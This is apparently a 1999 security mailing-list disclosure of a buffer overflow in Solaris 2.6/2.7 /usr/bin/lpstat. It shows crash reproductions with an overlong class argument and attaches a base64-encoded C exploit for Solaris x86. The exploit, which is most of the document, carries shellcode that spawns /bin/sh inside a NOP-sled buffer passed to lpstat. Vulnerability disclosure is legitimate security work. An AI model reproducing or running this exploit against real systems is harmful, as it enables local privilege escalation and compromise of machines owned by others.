Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

[plasmoid () PIMMEL COM (plasmoid deep/thc/clb)]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

---559023410-851401618-917362967=:548
Content-Type: TEXT/PLAIN; charset=US-ASCII


On Aug/25/98 Sun released the following patches for lp:

 Solaris2.6 Sparc: 106235-02
 Solaris2.6 x86:   106236

It is quite sad, that they did not fix another overflow in
/usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86
and 2.6 Sparc, I assume that it is also present on Solaris 2.6
x86 and 2.7 Sparc.

Solaris 2.7 x86
% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
% UX:lpstat: ERROR: Class
                    [...]
%                   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
%                   not exist.
%           TO FIX: Use the "lpstat -c all" command to list
%                   all known classes.
% Segmentation Fault
% plasmoid@gorkie:foo>

Solaris 2.6 Sparc
% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
% UX:lpstat: ERROR: Class
                    [...]
%                   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
%                   exist.
%          TO FIX: Use the "lpstat -c all" command to list
%                  all known classes.
% Segmentation Fault
% plasmoid@bock:foo>

This overflow is definitly exploitable, i attached the exploit for
Solaris x86. Quality patches for all Solaris versions can be obtained
from www.hert.org, a fast security source.

plasmoid deep/thc/clb
http://thc.inferno.tusculum.edu


---559023410-851401618-917362967=:548
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="lpstat.x86.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.05.9901261502470.548@gorkie>
Content-Description:
Content-Disposition: attachment; filename="lpstat.x86.c"

LyoNCiAqIGxwc3RhdCBzcGxvaXQgZm9yIHNvbGFyaXMgMi42LzIuNw0KICog
YnkgcGxhc21vaWQvZGVlcC90aGMgPHBsYXNtb2lkQHBpbW1lbC5jb20+IChj
KSAxOTk5DQogKiBzdXBwb3J0ZWQgYnkgaW5zZWN0ZWQgYW5kIHdpbGtpbnMN
CiAqIA0KICogVEhDIC0gVGhlIEhhY2tlcidzIENob2ljZQ0KICogaHR0cDov
L3RoYy5pbmZlcm5vLnR1c2N1bHVtLmVkdQ0KICovIA0KDQoNCg0KI2luY2x1
ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8
c3RkbGliLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQoNCg0KY2hhciBzaGVs
bFtdID0NCiAiXHhlYlx4NDhceDlhXHhmZlx4ZmZceGZmXHhmZlx4MDdceGZm
XHhjM1x4NWVceDMxXHhjMFx4ODlceDQ2XHhiNCINCiAiXHg4OFx4NDZceGI5
XHg4OFx4NDZceDA3XHg4OVx4NDZceDBjXHgzMVx4YzBceDUwXHhiMFx4OGRc
eGU4XHhkZiINCiAiXHhmZlx4ZmZceGZmXHg4M1x4YzRceDA0XHgzMVx4YzBc
eDUwXHhiMFx4MTdceGU4XHhkMlx4ZmZceGZmXHhmZiIgIA0KICJceDgzXHhj
NFx4MDRceDMxXHhjMFx4NTBceDhkXHg1ZVx4MDhceDUzXHg4ZFx4MWVceDg5
XHg1ZVx4MDhceDUzIg0KICJceGIwXHgzYlx4ZThceGJiXHhmZlx4ZmZceGZm
XHg4M1x4YzRceDBjXHhlOFx4YmJceGZmXHhmZlx4ZmZceDJmIg0KICJceDYy
XHg2OVx4NmVceDJmXHg3M1x4NjhceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZc
eGZmXHhmZlx4ZmYiOyANCg0KY29uc3QgaW50IGJ1ZmZlcnNpemU9MTEwMDsN
CmNvbnN0IGNoYXIgeDg2X25vcD0weDkwOw0KbG9uZyBub3AsZXNwOw0KbG9u
ZyBvZmZzZXQ9MDsNCmNoYXIgYnVmZmVyWzIwMDBdOw0KDQpsb25nIGdldF9l
c3AoKSB7IF9fYXNtX18oIm1vdmwgJWVzcCwlZWF4Iik7IH0NCg0KaW50IG1h
aW4gKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgaTsNCiAg
ICANCiAgICAvKiB5b3Ugc2hvdWxkbid0IGVkaXQgdGhlIG9mZnNldCwgd2Ug
cnVuIHdpdGgNCiAgICAgICA4MDAgbm9wcyBpbiAxMTAwIGJ5dGVzIGJ1ZmZl
ciwgb25lIG9mIHRob3NlDQogICAgICAgbm9wcyBzaG91bGQgYmUgaGl0ICov
DQogICAgDQogICAgaWYgKGFyZ2MgPiAxKSBvZmZzZXQgPSBzdHJ0b2woYXJn
dlsxXSwgTlVMTCwgMCk7DQoNCiAgICAvKiBpZiB5b3UgZG9uJ3Qgc3VjY2Vl
ZCwgbW9kaWZ5IHRoZSBub3AgY291bnQsIA0KICAgICAgIHRoZSBzdGFuZGFy
dCB2YWx1ZSBvZiA4MDEgYnlidGVzIGlzIHF1aXRlDQogICAgICAgc3RyYW5n
ZSBlbnVmZiAqLw0KICAgICAgIA0KICAgIGlmIChhcmdjID4gMikgbm9wID0g
c3RydG91bChhcmd2WzJdLCBOVUxMLCAwKTsNCiAgICBlbHNlDQogICAgICAg
IG5vcCA9IDgwMTsNCg0KICAgIGVzcCA9IGdldF9lc3AoKTsNCg0KICAgIG1l
bXNldChidWZmZXIsIHg4Nl9ub3AsIGJ1ZmZlcnNpemUpOw0KICAgIG1lbWNw
eShidWZmZXIrbm9wLCBzaGVsbCwgc3RybGVuKHNoZWxsKSk7DQogICAgZm9y
IChpID0gbm9wK3N0cmxlbihzaGVsbCk7IGkgPCBidWZmZXJzaXplLTQ7IGkg
Kz0gNCkNCiAgICAgICAgKigoaW50ICopICZidWZmZXJbaV0pID0gZXNwK29m
ZnNldDsNCg0KICAgIGV4ZWNsKCIvdXNyL2Jpbi9scHN0YXQiLCAibHBzdGF0
IiwgIi1jIiwgYnVmZmVyLCBOVUxMKTsNCg0KICAgIHByaW50ZigiZXhlYyBm
YWlsZWQhXG4iKTsNCiAgICByZXR1cm4gMDsNCn0NCg==
---559023410-851401618-917362967=:548--